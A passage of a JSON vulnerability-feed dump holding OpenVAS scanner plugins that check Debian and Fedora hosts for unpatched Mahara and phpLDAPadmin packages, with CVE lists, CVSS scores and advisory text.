security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-24T12:51:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70550", "href": "http://plugins.openvas.org/nasl.php?oid=70550", "type": "openvas", "title": "Debian Security Advisory DSA 2334-1 (mahara)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2334_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2334-1 (mahara)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\nTeemu Vesala discovered that missing input sanitising of RSS\nfeeds could lead to cross-site scripting.\n\nCVE-2011-2772\n\nRichard Mansfield discovered that insufficient upload restrictions\nallowed denial of service.\n\nCVE-2011-2773\n\nRichard Mansfield that the management of institutions was prone to\ncross-site request forgery.\n\n(no CVE ID available yet)\n\nAndrew Nichols discovered a privilege escalation vulnerability\nin MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\n\nWe recommend that you upgrade your mahara packages.\";\ntag_summary = \"The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202334-1\";\n\nif(description)\n{\n script_id(70550);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:34 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2334-1 (mahara)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-mediaplayer\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "description": "The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.", "modified": "2019-03-18T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:136141256231070550", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070550", "type": "openvas", "title": "Debian Security Advisory DSA 2334-1 (mahara)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2334_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2334-1 (mahara)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70550\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:34 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2334-1 (mahara)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202334-1\");\n script_tag(name:\"insight\", value:\"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder:\n\nCVE-2011-2771\n\nTeemu Vesala discovered that missing input sanitising of RSS\nfeeds could lead to cross-site scripting.\n\nCVE-2011-2772\n\nRichard Mansfield discovered that insufficient upload restrictions\nallowed denial of service.\n\nCVE-2011-2773\n\nRichard Mansfield that the management of institutions was prone to\ncross-site request forgery.\n\n(no CVE ID available yet)\n\nAndrew Nichols discovered a privilege escalation vulnerability\nin MNet handling.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.1-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your mahara packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to mahara\nannounced via advisory DSA 2334-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny11\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mahara-mediaplayer\", ver:\"1.2.6-2+squeeze3\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14986", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863642", "href": "http://plugins.openvas.org/nasl.php?oid=863642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14986\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n\n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n\n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Fedora 14\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\");\n script_id(863642);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:59:09 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14986\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14986\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:07:00", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:863956", "href": "http://plugins.openvas.org/nasl.php?oid=863956", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n\n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n\n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\n\ntag_affected = \"phpldapadmin on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\");\n script_id(863956);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:15 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14924\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14924\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14986", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863642", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863642", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14986\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863642\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:59:09 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14986\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14986\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863956", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863956\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:15 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14924\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14924\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:40:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14993", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863637", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14993\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863637\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-25 11:58:32 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-14993\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14993\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2011-11-25T00:00:00", "type": "openvas", "title": "Fedora Update for phpldapadmin FEDORA-2011-14993", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863637", "href": "http://plugins.openvas.org/nasl.php?oid=863637", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpldapadmin FEDORA-2011-14993\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PhpLDAPadmin is a web-based LDAP client.\n It provides easy, anywhere-accessible, multi-language administration\n for your LDAP server. Its hierarchical tree-viewer and advanced search\n functionality make it intuitive to browse and administer your LDAP directory.\n\n Since it is a web application, this LDAP browser works on many platforms,\n making your LDAP server easily manageable from any location.\n \n PhpLDAPadmin is the perfect LDAP browser for the LDAP professional\n and novice alike. Its user base consists mostly of LDAP administration\n professionals.\n \n Edit /etc/phpldapadmin/config.php to change default (localhost) LDAP server\n location and other things. Edit /etc/httpd/conf.d/phpldapadmin.conf to allow\n access by remote web-clients.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Fedora 15\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\");\n script_id(863637);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n 